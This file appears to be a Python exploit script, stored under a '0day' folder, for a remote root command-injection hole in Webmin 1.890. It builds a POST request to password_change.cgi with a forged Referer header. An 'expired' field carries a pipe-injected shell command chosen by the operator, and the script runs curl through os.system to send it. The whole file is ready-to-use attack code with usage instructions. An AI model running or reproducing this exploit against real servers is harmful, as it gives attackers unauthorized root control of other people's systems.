0day/CMS/Webmin/exploit.py

#!/usr/bin/env python3
import os
import sys


STAIN = """
WebMin 1.890-expired-remote-root
"""
usage = """Usage: python3 exploit.py target COMMAND

Ex: python3 exploit.py http://10.0.0.1:10000 id
                                                                                                                                   
"""

def exploit(target, url, command):
    header = 'Referer: {}/session_login.cgi'.format(target)
    payload = 'user=gotroot&pam=&expired=2|echo "";{}'.format(command)
    os.system("curl -k {} -d '{}' -H '{}'".format(url,payload,header))


if __name__ == '__main__':
    try:
        print(STAIN)
        target = sys.argv[1].rstrip("/")
        url = target+"/password_change.cgi"
        command = sys.argv[2]
        exploit(target, url, command)
    except:
        print(STAIN)
        print(usage)